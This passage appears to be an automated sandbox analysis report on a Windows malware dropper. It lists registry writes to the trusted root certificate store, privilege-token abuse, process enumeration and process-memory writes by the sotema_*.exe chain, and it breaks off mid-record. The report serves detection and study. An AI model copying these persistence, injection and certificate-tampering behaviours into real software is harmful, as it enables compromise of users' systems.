F1BG9.exesotema_3.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 1900000001000000100000001f7e750b566b128ac0b8d6576d2a70a50f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df153000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b0020004300410000006200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e1400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f71d0000000100000010000000e3f9af952c6df2aaa41706a77a44c20303000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e040000000100000010000000d5e98140c51869fc462c8975620faa782000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c F1BG9.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 0400000001000000100000002c8f9f661d1890b147269d8e86828ca90f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad09000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b06010505070308620000000100000020000000d8e0febc1db2e38d00940f37d27d41344d993e734b99d5656d9778d4d81436247f0000000100000016000000301406082b0601050507030906082b060105050703011400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded31d000000010000001000000096f98b6e79a74810ce7d398a82f977780b000000010000000e000000430065007200740075006d0000007e00000001000000080000000000cf97a737d6010300000001000000140000006252dc40f71143a22fde9ef7348e064251b181181900000001000000100000000b6cd9778e41ad67fd6be0a6903710442000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73 F1BG9.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118\Blob = 5c0000000100000004000000000800001900000001000000100000000b6cd9778e41ad67fd6be0a6903710440300000001000000140000006252dc40f71143a22fde9ef7348e064251b181187e00000001000000080000000000cf97a737d6010b000000010000000e000000430065007200740075006d0000001d000000010000001000000096f98b6e79a74810ce7d398a82f977781400000001000000140000006daa9b0987c4d0d422ed4007374d19f191ffded37f0000000100000016000000301406082b0601050507030906082b06010505070301620000000100000020000000d8e0febc1db2e38d00940f37d27d41344d993e734b99d5656d9778d4d814362409000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000001e427a3639cce4c27e94b1777964ca289a722cad0400000001000000100000002c8f9f661d1890b147269d8e86828ca92000000001000000100300003082030c308201f4a0030201020203010020300d06092a864886f70d0101050500303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d204341301e170d3032303631313130343633395a170d3237303631313130343633395a303e310b300906035504061302504c311b3019060355040a1312556e697a65746f2053702e207a206f2e6f2e311230100603550403130943657274756d20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ceb1c12ed34f7ccd25ce183e4fc48c6f806a73c85b51f89bd2dcbb005cb1a0fc7503ee81f088ee2352e9e615338dac2d09c576f92b398089e4974b90a5a878f873437ba461b0d858cce16c667e9cf3095e556384d5a8eff3b12e3068b3c43cd8ac6e8d995a904e34dc369a8f818850b76d964209f3d795830d414bb06a6bf8fc0f7e629f67c4ed265f10260f084ff0a45728ce8fb8ed45f66eee255daa6e39bee4932fd947a072ebfaa65bafca533fe20ec69656116ef7e966a926d87f9553ed0a8588ba4f29a5428c5eb6fc852000aa680ba11a85019cc446638288b622b1eefeaa46597ecf352cd5b6da5df748331454b6ebd96fcecd88d6ab1bda963b1d590203010001a3133011300f0603551d130101ff040530030101ff300d06092a864886f70d01010505000382010100b88dceefe714bacfeeb044926cb4393ea2846eadb82177d2d4778287e6204181eee2f811b763d11737be1976241c041a4ceb3daa676f2dd4cdfe653170c51ba6020aba607b6d58c29a49fe63320b6be33ac0acab3bb0e8d309518c1083c634e0c52be01ab66014276c32778cbcb27298cfcdcc3fb9c8244214d657fce62643a91de58090ce0354283ef73fd3f84ded6a0a3a93139b3b142313639c3fd1872779e54c51e301ad855d1a3bb1d57310a4d3f2bc6e64f55a5690a8c70e4c740f2e713bf7c847f4696f15f2115e831e9c7c52aefd02da12a8596718dbbc70dd9bb169ed80ce8940486a0e35ca29661521942ce8602a9b854a40f36b8a24ec06162c73 F1BG9.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 040000000100000010000000d5e98140c51869fc462c8975620faa7803000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1d0000000100000010000000e3f9af952c6df2aaa41706a77a44c2031400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f76200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e0b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b002000430041000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df12000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c F1BG9.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 5c000000010000000400000000080000040000000100000010000000d5e98140c51869fc462c8975620faa7803000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1d0000000100000010000000e3f9af952c6df2aaa41706a77a44c2031400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f76200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e0b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b002000430041000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df11900000001000000100000001f7e750b566b128ac0b8d6576d2a70a52000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c F1BG9.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118 F1BG9.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 sotema_3.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e sotema_3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E F1BG9.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 0f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df153000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b0020004300410000006200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e1400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f71d0000000100000010000000e3f9af952c6df2aaa41706a77a44c20303000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e2000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c F1BG9.exe -
Runs .reg file with regedit 1 IoCs
Processes:
Regedit.exepid process 4760 Regedit.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
sotema_2.exejfiag3g_gg.exepid process 1640 sotema_2.exe 1640 sotema_2.exe 1904 jfiag3g_gg.exe 1904 jfiag3g_gg.exe 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 896 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 896 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
sotema_2.exepid process 1640 sotema_2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
sotema_5.exesotema_7.exeRaRBFtrTBYU1Y0tjpmree9bR.exeaZNvbi1qOlM2iXjLOIdGOTe7.exepowershell.exepowershell.exepowershell.exepowershell.exe55FM6.exeH9LM9.exeF1BG9.exedescription pid process Token: SeDebugPrivilege 448 sotema_5.exe Token: SeDebugPrivilege 3928 sotema_7.exe Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeDebugPrivilege 448 RaRBFtrTBYU1Y0tjpmree9bR.exe Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeDebugPrivilege 1344 aZNvbi1qOlM2iXjLOIdGOTe7.exe Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeDebugPrivilege 4836 powershell.exe Token: SeDebugPrivilege 5004 powershell.exe Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeDebugPrivilege 5112 powershell.exe Token: SeDebugPrivilege 4752 powershell.exe Token: SeDebugPrivilege 4988 55FM6.exe Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeDebugPrivilege 5232 H9LM9.exe Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeDebugPrivilege 5872 F1BG9.exe Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 Token: SeCreatePagefilePrivilege 896 Token: SeShutdownPrivilege 896 -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
V3ujjI6J5Cgn10sQZ2ltQJBx.exeattrib.exepid process 4148 V3ujjI6J5Cgn10sQZ2ltQJBx.exe 5420 attrib.exe 5420 attrib.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exesotema_7.exesotema_4.exesotema_1.exedescription pid process target process PID 4024 wrote to memory of 3100 4024 b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe setup_installer.exe PID 4024 wrote to memory of 3100 4024 b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe setup_installer.exe PID 4024 wrote to memory of 3100 4024 b3c29854b98506ff5862ee14f25ece7b219f24ed3544729740dcd2c3568e3c24.exe setup_installer.exe PID 3100 wrote to memory of 3104 3100 setup_installer.exe setup_install.exe PID 3100 wrote to memory of 3104 3100 setup_installer.exe setup_install.exe PID 3100 wrote to memory of 3104 3100 setup_installer.exe setup_install.exe PID 3104 wrote to memory of 2288 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 2288 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 2288 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 1224 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 1224 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 1224 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 3108 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 3108 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 3108 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 2180 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 2180 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 2180 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 1492 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 1492 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 1492 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 644 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 644 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 644 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 2880 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 2880 3104 setup_install.exe cmd.exe PID 3104 wrote to memory of 2880 3104 setup_install.exe cmd.exe PID 2180 wrote to memory of 3832 2180 cmd.exe sotema_4.exe PID 2180 wrote to memory of 3832 2180 cmd.exe sotema_4.exe PID 2180 wrote to memory of 3832 2180 cmd.exe sotema_4.exe PID 644 wrote to memory of 1184 644 cmd.exe sotema_6.exe PID 644 wrote to memory of 1184 644 cmd.exe sotema_6.exe PID 644 wrote to memory of 1184 644 cmd.exe sotema_6.exe PID 1224 wrote to memory of 1640 1224 cmd.exe sotema_2.exe PID 1224 wrote to memory of 1640 1224 cmd.exe sotema_2.exe PID 1224 wrote to memory of 1640 1224 cmd.exe sotema_2.exe PID 1492 wrote to memory of 448 1492 cmd.exe sotema_5.exe PID 1492 wrote to memory of 448 1492 cmd.exe sotema_5.exe PID 2288 wrote to memory of 484 2288 cmd.exe sotema_1.exe PID 2288 wrote to memory of 484 2288 cmd.exe sotema_1.exe PID 2288 wrote to memory of 484 2288 cmd.exe sotema_1.exe PID 2880 wrote to memory of 3064 2880 cmd.exe sotema_7.exe PID 2880 wrote to memory of 3064 2880 cmd.exe sotema_7.exe PID 2880 wrote to memory of 3064 2880 cmd.exe sotema_7.exe PID 3108 wrote to memory of 860 3108 cmd.exe sotema_3.exe PID 3108 wrote to memory of 860 3108 cmd.exe sotema_3.exe PID 3108 wrote to memory of 860 3108 cmd.exe sotema_3.exe PID 3064 wrote to memory of 3572 3064 sotema_7.exe sotema_7.exe PID 3064 wrote to memory of 3572 3064 sotema_7.exe sotema_7.exe PID 3064 wrote to memory of 3572 3064 sotema_7.exe sotema_7.exe PID 3832 wrote to memory of 1776 3832 sotema_4.exe jfiag3g_gg.exe PID 3832 wrote to memory of 1776 3832 sotema_4.exe jfiag3g_gg.exe PID 3832 wrote to memory of 1776 